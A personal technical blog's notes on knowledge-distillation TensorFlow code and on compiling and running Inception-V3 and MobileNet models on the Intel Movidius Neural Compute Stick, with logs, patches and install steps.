                            activation_fn=tf.nn.relu) :
            
            net = slim.fully_connected(net,625,scope='fc1')
            net = tf.nn.dropout(net, keep_prob_hidden)
            net = slim.fully_connected(net,NUMBER_OF_CLASS,activation_fn=None,scope='fc2')
            
            net = tf.nn.softmax(net/temperature)
            return net


# In[4]:


def MnistNetworkStudent(input,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.fully_connected],
                                          biases_initializer=tf.constant_initializer(0.0),
                                          activation_fn=tf.nn.sigmoid):
            
            net = slim.fully_connected(input,1000,scope = 'fc1')
            net = slim.fully_connected(net,
                                       NUMBER_OF_CLASS,
                                       activation_fn = None,
                                       scope = 'fc2')
            
            return net


# In[5]:


def loss(prediction,output,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        output * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
                                                  reduction_indices=[1]))      
    correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy,accuracy


# In[6]:


eps = 0.1
alpha = 0.5
temperature = 1
start_lr = 1e-4
decay = 1e-6


# In[7]:


with tf.Graph().as_default():
        
    
     

    x = tf.placeholder(tf.float32, shape=[None, 28,28,1], name='input')
    y_ = tf.placeholder(tf.float32, shape=[None, NUMBER_OF_CLASS])
    keep_prob_conv = tf.placeholder(tf.float32)
    keep_prob_hidden = tf.placeholder(tf.float32)
    x_line = tf.reshape(x, [-1,784])

    y_conv_teacher=MnistNetworkTeacher(x,keep_prob_conv,
                                       keep_prob_hidden,scope = 'teacher')
    y_conv = MnistNetworkStudent(x_line,scope = 'student')

    y_conv_student = tf.nn.softmax(y_conv/temperature)
    y_conv_student_actual = tf.nn.softmax(y_conv)

    cross_entropy_teacher, accuracy_teacher=loss(y_conv_teacher,
                                                 y_,
                                                temperature = temperature)
    student_loss1, accuracy_student = loss(y_conv_student_actual,
                                           y_,
                                          temperature = temperature)
    
    student_loss2 = tf.reduce_mean(
        - tf.reduce_sum(y_conv_teacher * tf.log(tf.clip_by_value(y_conv_student, 1e-10,1.0)), reduction_indices=1)
    )
    cross_entropy_student = student_loss1 + student_loss2
    
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'teacher' in var.name]
    var_student = [var for var in model_vars if 'student' in var.name]

    grad_teacher = tf.gradients(cross_entropy_teacher,var_teacher)
    grad_student = tf.gradients(cross_entropy_student,var_student)

    l_rate = tf.placeholder(shape=[],dtype = tf.float32)
    
    trainer = tf.train.RMSPropOptimizer(learning_rate = l_rate)
    trainer1 = tf.train.GradientDescentOptimizer(0.1)

    train_step_teacher = trainer.apply_gradients(zip(grad_teacher,var_teacher))
    train_step_student = trainer1.apply_gradients(zip(grad_student,var_student))

    sess = tf.InteractiveSession()
    sess.run(tf.global_variables_initializer())
    saver1 = tf.train.Saver(var_teacher)
    saver2 = tf.train.Saver(var_student)
    


# In[8]:


#mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)  

x_train, y_train, x_test, y_test, class_count = loadimg.loadimg(
    '/home/tokunn/make_image/',
    NUMBER_OF_CLASS
)


# In[9]:


for i in range(10000):
  #batch = mnist.train.next_batch(128)
  s = 128*i % len(x_train)
  batch = [x_train[s:s+128], y_train[s:s+128]]
  lr = start_lr * 1.0/(1.0 + i*decay)
  if i%100 ==0:
    train_accuracy = accuracy_teacher.eval(feed_dict={x:x_test,
                                                      y_: y_test,
                                                      keep_prob_conv: 1.0,
                                                      keep_prob_hidden: 1.0})
    print("step %d, training accuracy %g,"%(i, train_accuracy))
  train_step_teacher.run(feed_dict={x: batch[0],
                                    y_: batch[1],
                                    keep_prob_conv :0.8,
                                    #keep_prob_hidden:0.5})
                                    keep_prob_hidden:0.5,
                                    l_rate:lr})

saver1.save(sess,'./models/teacher1.ckpt')
print('*'*20)


 
for i in range(30000):
  #batch = mnist.train.next_batch(100)
  s = 128*i % len(x_train)
  batch = [x_train[s:s+100], y_train[s:s+100]]
  if i%100 == 0:
    train_accuracy = accuracy_student.eval(feed_dict={x:x_test,
                                                      y_: y_test,
                                                      keep_prob_conv: 1.0,
                                                      keep_prob_hidden: 1.0})
    print("step %d, training accuracy %g"%(i, train_accuracy))
  train_step_student.run(feed_dict={x: batch[0],
                                    y_: batch[1],
                                    keep_prob_conv :1.0,
                                    keep_prob_hidden:1.0})

  
saver2.save(sess,'./models/student.ckpt')  



# In[10]:


test_acc = sess.run(accuracy_student,feed_dict={x: x_test,
                                                y_: y_test,
                                                keep_prob_conv: 1.0,
                                                keep_prob_hidden: 1.0})
print("test accuracy of the student model is %g "%(test_acc))


# In[11]:


fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()
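Both training loops pick their batch with s = 128*i % len(x_train) and then slice from s. A quick sketch of the resulting index ranges shows two side effects: the last batch before the wrap-around is short, and the student loop (batch 100, stride 128) skips 28 samples after every batch. The dataset size of 300 is made up for illustration, and the helper name is my own.

```python
def batch_bounds(step, stride, batch_size, dataset_size):
    """Start/end indices as the loops compute them: s = stride*step % size, slice [s:s+batch]."""
    start = stride * step % dataset_size
    end = min(start + batch_size, dataset_size)  # Python slicing clamps at the end
    return start, end

dataset_size = 300  # hypothetical dataset size (illustration only)

# Teacher loop: stride 128, batch 128
teacher = [batch_bounds(i, 128, 128, dataset_size) for i in range(3)]
# Student loop: stride 128, batch 100
student = [batch_bounds(i, 128, 100, dataset_size) for i in range(3)]

print(teacher)
print(student)
```

If uniform batches matter, shuffling the indices once per epoch and stepping by the batch size would be one way to avoid both effects.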

2018-09-22

Running pretrained models from the TensorFlow Model Zoo on Movidius (Inception-V3 and MobileNet V1)

Method

It is described here: https://movidius.github.io/ncsdk/tf_modelzoo.html

Download the sources.

git clone https://github.com/tensorflow/tensorflow.git
git clone https://github.com/tensorflow/models.git

Download the pretrained checkpoint.

wget -nc http://download.tensorflow.org/models/inception_v3_2016_08_28.tar.gz
tar -xvf inception_v3_2016_08_28.tar.gz

Export the GraphDef file.

python3 ../models/research/slim/export_inference_graph.py \
        --alsologtostderr \
        --model_name=inception_v3 \
        --batch_size=1 \
        --dataset_name=imagenet \
        --image_size=299 \
        --output_file=inception_v3.pb

Freeze the graph.

python3 ../tensorflow/tensorflow/python/tools/freeze_graph.py \
        --input_graph=inception_v3.pb \
        --input_binary=true \
        --input_checkpoint=inception_v3.ckpt \
        --output_graph=inception_v3_frozen.pb \
        --output_node_name=InceptionV3/Predictions/Reshape_1

Compile.

mvNCCompile -s 12 inception_v3_frozen.pb -in=input -on=InceptionV3/Predictions/Reshape_1

Trying it out

At the freeze step

tokunn@tokunn-VirtualBox 16:13:16 [~/Documents/MovidiusTensorflow/use_modelzoo/inceptionV3] $ python3 ~/Documents/source/tensorflow/tensorflow/python/tools/freeze_graph.py \
>               --input_graph=inception_v3.pb \
                --input_binary=true \
                --input_checkpoint=inception_v3.ckpt \
                --output_graph=inception_v3_frozen.pb \
                --output_node_name=InceptionV3/Predictions/Reshape_1
Traceback (most recent call last):
  File "/home/tokunn/Documents/source/tensorflow/tensorflow/python/tools/freeze_graph.py", line 58, in <module>
    from tensorflow.python.training import checkpoint_management
ImportError: cannot import name 'checkpoint_management'

It does not work.

Apparently it is a bug: https://github.com/tensorflow/tensorflow/issues/22019

Apply a patch, as usual.

58d57
< from tensorflow.python.training import checkpoint_management
59a59
> import tensorflow as tf
127c127
<       not checkpoint_management.checkpoint_exists(input_checkpoint)):
---
>       not tf.train.checkpoint_exists(input_checkpoint)):

The frozen graph was written out successfully.
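Instead of editing the file by hand, the same idea can be written as a lookup that tries the newer location first and falls back to the older one. This is only a sketch of the pattern, not what freeze_graph.py does. The helper first_available is hypothetical, and the two TensorFlow locations are the ones that appear in the diff above.

```python
import importlib
from functools import reduce

def first_available(candidates):
    """Return the first object resolvable from (module name, dotted attribute path) pairs."""
    for module_name, attr_path in candidates:
        try:
            module = importlib.import_module(module_name)
            return reduce(getattr, attr_path.split("."), module)
        except (ImportError, AttributeError):
            continue  # this location does not exist in the installed version
    raise ImportError("none of the candidates could be resolved: {!r}".format(candidates))

# Locations taken from the diff above; resolving them needs TensorFlow installed.
CHECKPOINT_EXISTS_CANDIDATES = [
    ("tensorflow.python.training.checkpoint_management", "checkpoint_exists"),
    ("tensorflow", "train.checkpoint_exists"),
]

# Demonstration with the standard library so the sketch runs without TensorFlow:
# the first candidate is deliberately missing, the second one resolves.
exists = first_available([("no_such_module_for_demo", "f"), ("os", "path.exists")])
print(exists("."))
```

With TensorFlow installed, first_available(CHECKPOINT_EXISTS_CANDIDATES) would return whichever checkpoint_exists function the installed version provides.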

With mvNCCheck

tokunn@nanase 7:41:25 [~] $ mvNCCheck -s 12 inception_v3_frozen.pb -in=input -on=InceptionV3/Predictions/Reshape_1 2>/dev/null
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Result:  (1, 1, 1001)
1) 22 0.1576
2) 93 0.1223
3) 95 0.0448
4) 23 0.03558
5) 24 0.02771
Expected:  (1, 1001)
1) 22 0.1599765
2) 93 0.12189513
3) 95 0.04604088
4) 23 0.03503471
5) 24 0.02783106
------------------------------------------------------------
 Obtained values 
------------------------------------------------------------
 Obtained Min Pixel Accuracy: 1.4900462701916695% (max allowed=2%), Pass
 Obtained Average Pixel Accuracy: 0.01522512175142765% (max allowed=1%), Pass
 Obtained Percentage of wrong values: 0.0% (max allowed=0%), Pass
 Obtained Pixel-wise L2 error: 0.06495287965302322% (max allowed=1%), Pass
 Obtained Global Sum Difference: 0.02438097447156906
------------------------------------------------------------

It ran without problems.
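As a rough sanity check, the top-5 values printed above can be compared directly. The sketch below uses only those ten numbers, so it can only approximate what mvNCCheck measures over all 1001 outputs. Dividing the largest difference by the largest expected value is my assumption about what "Min Pixel Accuracy" means, not something taken from the tool's source.

```python
# Top-5 (class index: probability) pairs copied from the mvNCCheck output above
result = {22: 0.1576, 93: 0.1223, 95: 0.0448, 23: 0.03558, 24: 0.02771}
expected = {22: 0.1599765, 93: 0.12189513, 95: 0.04604088, 23: 0.03503471, 24: 0.02783106}

# Absolute difference per class, and the class with the largest one
abs_diff = {k: abs(result[k] - expected[k]) for k in expected}
worst_class = max(abs_diff, key=abs_diff.get)

# Largest difference as a percentage of the largest expected value (assumed metric)
worst_pct_of_peak = 100.0 * abs_diff[worst_class] / max(expected.values())

# Check that both outputs rank the five classes in the same order
same_ranking = (sorted(result, key=result.get, reverse=True)
                == sorted(expected, key=expected.get, reverse=True))

print(worst_class, worst_pct_of_peak, same_ranking)
```

The percentage lands close to the reported 1.49%, and the class ranking is identical, which matters most for classification.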

Trying another network (MobileNet V1)

List of networks: https://github.com/tensorflow/models/tree/master/research/slim/nets

List of weights: https://github.com/tensorflow/models/tree/master/research/slim

Preparing the model

The network name is mobilenet_v1.

The weights are at http://download.tensorflow.org/models/mobilenet_v1_2018_02_22/mobilenet_v1_0.5_160.tgz

The downloaded weights archive turned out to also contain mobilenet_v1_0.5_160_frozen.pb.
All that is left is to compile it.

Finding the input/output nodes

Search the .pb file for the nodes.

https://ncsforum.movidius.com/discussion/683/tensorflow-conversion-toolkit-error-output-node-not-found

The code is attached.
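The attached script is not reproduced here, so the following is only a sketch of what such a node lister could look like, assuming TensorFlow 1.x. The function names are hypothetical. The "name , op" layout is chosen to match the result shown further down. The TensorFlow import is kept inside the loader so the formatting part runs without it.

```python
from types import SimpleNamespace

def format_nodes(nodes):
    """Render each node as 'name , op'."""
    return ["{} , {}".format(node.name, node.op) for node in nodes]

def load_graph_nodes(pb_path):
    """Parse a frozen GraphDef file and return its nodes (assumes TensorFlow 1.x)."""
    import tensorflow as tf  # imported lazily so format_nodes works without it
    graph_def = tf.GraphDef()
    with open(pb_path, "rb") as f:
        graph_def.ParseFromString(f.read())
    return graph_def.node

if __name__ == "__main__":
    # Stand-in nodes so the sketch runs without a .pb file. With TensorFlow
    # installed, load_graph_nodes("mobilenet_v1_0.5_160_frozen.pb") would be
    # used here instead.
    demo = [SimpleNamespace(name="input", op="Placeholder"),
            SimpleNamespace(name="MobilenetV1/Predictions/Reshape_1", op="Reshape")]
    print("\n".join(format_nodes(demo)))
```

Piping the output through grep, as in the result further down, narrows the list to the candidate input and output nodes.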

Result

tokunn@tokunn-VirtualBox 17:02:17 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1/getnodename_pb.py] $ python3 getnodename_pb.py | grep input
input , Placeholder

tokunn@tokunn-VirtualBox 17:03:10 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1/getnodename_pb.py] $ python3 getnodename_pb.py | grep Predictions
MobilenetV1/Predictions/Reshape_1 , Reshape

Presumably the nodes are this input and MobilenetV1/Predictions/Reshape_1.

Compile

Everything has gone smoothly so far, so on to compiling.

mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1

As expected, the never-ending battle with errors.

tokunn@tokunn-VirtualBox 17:10:23 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1] $ mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016

/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py:923: DeprecationWarning: builtin type EagerTensor has no __module__ attribute
  EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/util/tf_inspect.py:75: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  return _inspect.getargspec(target)
1
Traceback (most recent call last):
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1278, in _do_call
    return fn(*args)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1263, in _run_fn
    options, feed_dict, fetch_list, target_list, run_metadata)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1350, in _call_tf_sessionrun
    run_metadata)
tensorflow.python.framework.errors_impl.InvalidArgumentError: You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3]
     [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]]

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/bin/mvNCCompile", line 118, in <module>
    create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights)
  File "/usr/local/bin/mvNCCompile", line 104, in create_graph
    net = parse_tensor(args, myriad_config)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 1061, in parse_tensor
    desired_shape = node.inputs[1].eval()
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 680, in eval
    return _eval_using_default_session(self, feed_dict, self.graph, session)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 4951, in _eval_using_default_session
    return session.run(tensors, feed_dict)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 877, in run
    run_metadata_ptr)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1100, in _run
    feed_dict_tensor, options, run_metadata)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1272, in _do_run
    run_metadata)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1291, in _do_call
    raise type(e)(node_def, op, message)
tensorflow.python.framework.errors_impl.InvalidArgumentError: You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3]
     [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]]

Caused by op 'input', defined at:
  File "/usr/local/bin/mvNCCompile", line 118, in <module>
    create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights)
  File "/usr/local/bin/mvNCCompile", line 104, in create_graph
    net = parse_tensor(args, myriad_config)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 211, in parse_tensor
    tf.import_graph_def(graph_def, name="")
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/util/deprecation.py", line 454, in new_func
    return func(*args, **kwargs)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/importer.py", line 442, in import_graph_def
    _ProcessNewOps(graph)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/importer.py", line 234, in _ProcessNewOps
    for new_op in graph._add_new_tf_operations(compute_devices=False):  # pylint: disable=protected-access
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3289, in _add_new_tf_operations
    for c_op in c_api_util.new_tf_operations(self)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3289, in <listcomp>
    for c_op in c_api_util.new_tf_operations(self)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3180, in _create_op_from_tf_operation
    ret = Operation(c_op, self)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 1717, in __init__
    self._traceback = tf_stack.extract_stack()

InvalidArgumentError (see above for traceback): You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3]
     [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]]

Apparently nothing is being fed to the input placeholder?
Surely that is not my fault?

https://ncsforum.movidius.com/discussion/1010/why-is-there-an-invalidargumenterror-you-must-feed-a-value-for-placeholder-tensor-dense-1-input

I just got exactly the same problem. Hope someone can help

Sad.

https://github.com/ardamavi/Intel-Movidius-NCS-Keras/issues/2

The project is still in construction. Stay tuned!
This project is open source. If you share your patch, let's try to fix it together.

Sad.

I have come across similar problem, solved by modifying ncsdk source. In /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line 1059, add a feed_dict to eval:

As usual, the theory is that /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py is misbehaving.

1061c1061
<                 desired_shape = node.inputs[1].eval()
---
>                 desired_shape = node.inputs[1].eval(feed_dict={inputnode + ':0' : input_data})

So, once again, I cheerfully apply a patch.

tokunn@tokunn-VirtualBox 17:25:33 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1] $ mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 2>/dev/null
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016

1

Did it go through?
The output seems suspiciously short.

Check !

tokunn@nanase 8:32:09 [~] $ mvNCCheck -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 2>/dev/null
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290
USB: Transferring Data...
USB: Myriad Execution Finished
USB: Myriad Connection Closing.
USB: Myriad Connection Closed.
Result:  (1, 1, 1001)
1) 447 0.03534
2) 534 0.02742
3) 825 0.02272
4) 701 0.02151
5) 736 0.02039
Expected:  (1, 1001)
1) 447 0.035791013
2) 534 0.027337724
3) 825 0.02282799
4) 701 0.021315519
5) 736 0.020063626
------------------------------------------------------------
 Obtained values 
------------------------------------------------------------
 Obtained Min Pixel Accuracy: 2.3404913023114204% (max allowed=2%), Fail
 Obtained Average Pixel Accuracy: 0.06249707657843828% (max allowed=1%), Pass
 Obtained Percentage of wrong values: 0.0999000999000999% (max allowed=0%), Fail
 Obtained Pixel-wise L2 error: 0.14634640928212883% (max allowed=1%), Pass
 Obtained Global Sum Difference: 0.022390704602003098
------------------------------------------------------------

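The minimum pixel accuracy is off by a little over 2% (2.34% against an allowed 2%), but it seems to be working more or less correctly.

Running it

Now to feed it actual images and run it.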

tokunn@nanase 10:41:39 [~/mobilenet] $ python3 pr_mvd_mblnet.py flower 
ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory
Image path : flower/*.jpg
imgshape  (508, 75, 75)
Start prediting ...
534 534 534 534 534 534 534 534 534 534 534 534 540 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 825 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 540 534 742 534 869 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 751 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 540 534 534 534 534 534 534 534 540 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 869 534 534 534 534 534 540 534 534 534 
534 534 534 534 534 534 534 534 
Time : 7.718486547470093 (508 images)

It ran without problems.
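The two numbers worth pulling out of a run like this are which class IDs dominate and how fast inference was. A minimal sketch, using only the first 16 class IDs from the output above as an excerpt (the full run has 508) together with the reported time. The helper name summarize_run is made up for this sketch.

```python
from collections import Counter


def summarize_run(predictions, image_count, elapsed_seconds):
    """Return (most common class IDs, images per second, ms per image)."""
    top = Counter(predictions).most_common(2)
    images_per_second = image_count / elapsed_seconds
    ms_per_image = 1000.0 * elapsed_seconds / image_count
    return top, images_per_second, ms_per_image


# Excerpt: the first 16 class IDs printed above, not the full 508.
excerpt = [534] * 12 + [540, 534, 540, 534]

top, images_per_second, ms_per_image = summarize_run(
    excerpt, image_count=508, elapsed_seconds=7.718486547470093)
print(top)
print(round(images_per_second, 1), "images/s,", round(ms_per_image, 1), "ms/image")
```

Pasting the full list of IDs in place of the excerpt gives the real distribution for the run.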

Conclusion

Models from the Model Zoo can be used on the Movidius.

Source code

Code to list the nodes in a .pb file

#!/usr/bin/env python3

import tensorflow as tf
from tensorflow.python.platform import gfile
filename = '../mobilenet_v1_0.5_160_frozen.pb'

node_ops = []
with tf.gfile.GFile(filename, "rb") as f:
    graph_def = tf.GraphDef()
    graph_def.ParseFromString(f.read())

for node in graph_def.node:
    print(str(node.name) + " , " + str(node.op))
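The listing this script prints is mostly useful for finding the node names to pass as -in and -on. As a rough sketch, assuming the script's output has been captured as text, the Placeholder nodes (the input candidates) can be picked out as below. The helper find_nodes_by_op and the two sample lines are illustrative and not part of the original script.

```python
def find_nodes_by_op(listing, op_type):
    """Return node names whose op equals op_type.

    `listing` is text in the "name , op" format printed by the script above.
    """
    names = []
    for line in listing.splitlines():
        if " , " not in line:
            continue  # skip blank or unrelated lines
        name, op = line.rsplit(" , ", 1)
        if op.strip() == op_type:
            names.append(name.strip())
    return names


# Illustrative sample only; a real listing has many more lines.
sample_listing = """input , Placeholder
MobilenetV1/Predictions/Reshape_1 , Reshape
"""

placeholders = find_nodes_by_op(sample_listing, "Placeholder")
print(placeholders)
```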

Code to export a .pb from Keras

https://stackoverflow.com/questions/45466020/how-to-export-keras-h5-to-tensorflow-pb

def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):
    """
    Freezes the state of a session into a pruned computation graph.

    Creates a new computation graph where variable nodes are replaced by
    constants taking their current value in the session. The new graph will be
    pruned so subgraphs that are not necessary to compute the requested
    outputs are removed.
    @param session The TensorFlow session to be frozen.
    @param keep_var_names A list of variable names that should not be frozen,
                          or None to freeze all the variables in the graph.
    @param output_names Names of the relevant graph outputs.
    @param clear_devices Remove the device directives from the graph for better portability.
    @return The frozen graph definition.
    """
    from tensorflow.python.framework.graph_util import convert_variables_to_constants
    graph = session.graph
    with graph.as_default():
        freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))
        output_names = output_names or []
        output_names += [v.op.name for v in tf.global_variables()]
        input_graph_def = graph.as_graph_def()
        if clear_devices:
            for node in input_graph_def.node:
                node.device = ""
        frozen_graph = convert_variables_to_constants(session, input_graph_def,
                                                      output_names, freeze_var_names)
        return frozen_graph

import tensorflow as tf
from keras import backend as K

# Create, compile and train model...

frozen_graph = freeze_session(K.get_session(),
                              output_names=[out.op.name for out in model.outputs])

tf.train.write_graph(frozen_graph, "some_directory", "my_model.pb", as_text=False)

2018-09-22

Notes on running a TensorFlow model on a Raspberry Pi with the Intel Movidius Neural Compute Stick

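Overview

I want to do image recognition with TensorFlow on a Raspberry Pi!
But running TensorFlow on the Raspberry Pi's CPU is painfully slow.
Plugging an Intel Movidius into the RPi makes inference dramatically faster.

Getting this to work took a lot of effort, so I am leaving these notes.

Note that the stick only does inference. Do the training on another computer.

The procedure is:

Train with TensorFlow on a high-spec computer
Save the trained TensorFlow model and compile it into a graph that runs on the Movidius
Bring the graph to the RPi and run inference on the Movidius

That is the overall flow.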

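About this post

What follows is a copy-paste of the notes I took while working.
They were not written to explain anything to anyone, so they are probably quite hard to read.
If you have questions, ask me on Twitter:
とーくん (@KTokunn) on Twitter

These notes are long-winded, so I do not recommend reading them seriously from start to finish.
Use Ctrl+F to search for keywords from your error message instead.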

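What I did
- Ran the TensorFlow low-level MNIST sample (deep mnist) on the Movidius
- Rewrote the library so that mvNCCompile, mvNCProfile, and mvNCCheck would run (for some reason these tools did not work correctly in my environment)
- Getting mvNCCheck to load an image was pure brute force

Also, I wrapped a lot of the output in details tags, so it is collapsed like this:

Collapsed section

Click the triangle on the left to expand and read it.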

About the Movidius NCSDK

What is the NCSDK?

The Movidius NCSDK is an SDK that includes compilers for converting and checking models for the Movidius, and an API for running inference with those models.

 mvNCCompile, mvNCCheck, mvNCProfile

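Movidius NCSDK versions

NCSDK1
NCSDK2

NCAPI v2, included in NCSDK2, uses different API functions and is not compatible with v1.

There is more information available for NCSDK1, so that is what I use here.
Apparently SDK1 can only use 16-bit floats, whereas SDK2 can use 32-bit floats (?)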
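If SDK1 really does work in 16-bit floats, some difference from TensorFlow's float32 output is expected on precision grounds alone. A small sketch of what half precision does to one value, using only the standard library; the value is one of the Expected scores from an mvNCCheck log in these notes, and to_float16 is a name made up here. This illustrates float16 rounding in general, not what the stick does internally.

```python
import struct


def to_float16(x):
    """Round a Python float to the nearest IEEE 754 half-precision value."""
    return struct.unpack("<e", struct.pack("<e", x))[0]


value = 0.035791013  # a float32 score from an mvNCCheck "Expected" line
half = to_float16(value)
relative_error = abs(half - value) / value
print(half, relative_error)
```

For normal-range values the relative rounding error of a single float16 conversion stays at or below 2**-11, so larger gaps between Result and Expected come from error accumulated across the network rather than from one rounding step.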

How to use the Movidius NCSDK from TensorFlow

Write the program in TensorFlow.
Save the model.
Open the model in TensorFlow, edit it, and save it again.
Compile the saved model into a graph for the Movidius.
Transfer the graph to the Movidius and run it.

Installing the NCSDK

For details, see https://movidius.github.io/ncsdk/install.html

On a Raspberry Pi 3, each install takes about 4 hours.

NCSDK1

wget https://ncs-forum-uploads.s3.amazonaws.com/ncsdk/ncsdk-01_12_00_01-full/ncsdk-1.12.00.01.tar.gz

NCSDK2

wget https://ncs-forum-uploads.s3.amazonaws.com/ncsdk/ncsdk-02_05_00_02-full/ncsdk-2.05.00.02.tar.gz

Common steps

tar xvf ncsdk-*
cd ncsdk-*
make install
make examples

Running the example (v1, v2)

There is an Inception-V3 example in ncsdk-*/examples/tensorflow/inception_v3.

File layout

Makefile
inception-v3.py
run.py
categories.txt
inputsize.txt

How it works

Running make invokes inception-v3.py and mvNCCompile. inception-v3.py downloads the pretrained Inception-V3 model and saves a ckpt.meta file. The model comes from tensorflow.contrib.slim.nets. mvNCCompile generates the graph file from ckpt.meta.
Running make run invokes run.py. run.py loads the graph file onto the Movidius, runs inference on a single image, and prints the result.

Result

Number of categories: 1001
Start download to NCS...
*******************************************************************************
inception-v3 on NCS
*******************************************************************************
547 electric guitar 0.9883
403 acoustic guitar 0.00772
715 pick, plectrum, plectron 0.001509
421 banjo 0.000926
820 stage 0.0006595
*******************************************************************************
Finished

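It worked correctly with both the V1 and V2 APIs, and the output was electric guitar.

1. Without Movidius
[10.55, 2.15, 2.16, 2.10, 3.90, 2.12, n/a, n/a, n/a, n/a] (10 runs, in seconds)
RAM usage: about 90%
CPU usage: about 90%
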